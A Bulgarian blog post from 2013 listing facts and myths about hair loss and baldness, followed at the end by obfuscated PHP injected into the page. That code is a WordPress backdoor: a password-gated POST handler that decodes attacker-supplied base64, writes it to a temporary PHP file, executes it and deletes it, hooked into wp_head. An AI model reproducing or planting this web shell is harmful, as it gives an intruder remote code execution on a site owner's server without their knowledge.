Факти и митове за косопада и оплешивяването | Косопад

Факти и митове за косопада и оплешивяването

оплешивяванеОт момента, в който излезете от майчината утроба, започвате да водите битка, която няма как да спечелите – няма да се появи нито един нов фоликул през целия ви живот. Жестоката истина е, че при близо 60% от мъжете първите признаци на оплешивяване се появяват преди да са навършили 35 години. Когато станат на 50, фоликулите започват да умират, в следствие на което 85% от мъжете губят значителна част от косата си.

Мислите, че знаете всичко за косопада? Време е да отделим истината от измислиците!

ПЛЕШИВ СИ ЗАРАДИ МАЙКА ТИ – ГРЕШНО

Наследствеността от майката е малко по- силна, но оплешивяването се наследява от бащата.

ЕЖЕДНЕВНО ВСЕКИ ИМА КОСОПАД – ВЯРНО

Американският Съюз на дерматолозите е доказал, че ежедневно губим близо 100 косъма. Обикновено те се заместват от нови. Хората, които оплешивяват, произвеждат много тънки косми, докато накрая фоликулите не се затворят напълно.

МНОГО СЕКС ПРЕДИЗВИКВА ОПЛЕШИВЯВАНЕ – ГРЕШНО

Изследвания, публикувани в световния журнал по урология, разкриват повишени нива на тестостерона при хора, които не оплешивяванеса правили секс от три седмици, но няма доказателства, че това предизвиква оплешивяване.

СЕШОАРЪТ ПРЕДИЗВИКВА КОСОПАД – ВЯРНО

„Използването на сешоари на високи градуси предизвиква косопад, като загубената коса може и да се възстанови“, обясняват специалистите.

ОТ БРЪСНЕНЕТО КОСАТА СТАВА ПО- СИЛНА – ГРЕШНО

„Единственият резултат е, че през първите дни е по- твърда при допир, което създава усещането, че е по- гъста“, разкриват дерматолозите

СТЕРОИДИТЕ ПОВИШАВАТ РИСКА ОТ ОПЛЕШИВЯВАНЕ – ВЯРНО

Андрогенно- анаболните стероиди предизвикват синтеза на хормона, който предизвиква оплешивяване.

ШАПКАТА ПРЕДИЗВИКВА КОСОПАД – ГРЕШНО

Фоликулите получават кислород от капилярната мрежа, а не от въздуха. „Много хора, които носят шапки и каски, им приписват причината за косопада и оплешивяването си, но истината е, че това щеше да им се случи и ако не ги носеха“, обясняват експертите.

18. октомври 2013 12:07:09 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}